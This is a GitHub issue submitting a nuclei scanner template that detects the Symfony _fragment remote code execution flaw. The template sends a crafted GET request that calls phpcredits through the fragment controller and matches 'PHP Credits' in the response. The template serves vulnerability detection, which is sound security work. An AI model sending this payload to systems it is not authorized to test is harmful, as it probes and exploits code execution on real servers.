### ISSUE TITLE
[nuclei-template] Symfony RCE

### ISSUE THREAD

**Issue by Elsfa7-110** [projectdiscovery/nuclei-templates#2173]
**Template Details**
https://raw.githubusercontent.com/Elsfa7-110/testbug/main/SymfonyRCE.yaml
and thx to my friend Emad Shanab

```yaml

id: rce-symfony

info:
  name: symfony rce
  author: ELSFA7110
  severity: high
  reference: |
    - https://www.acunetix.com/vulnerabilities/web/symfony-rce-via-weak-predictable-app_secret
    - https://www.ambionics.io/blog/symfony-secret-fragment
  tags: rce

requests:
  - method: GET
    path:
      - "{{BaseURL}}/_fragment?_path=_controller=phpcredits&flag=-1"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "PHP Credits"
        part: body

      - type: status
        status:
          - 200

```
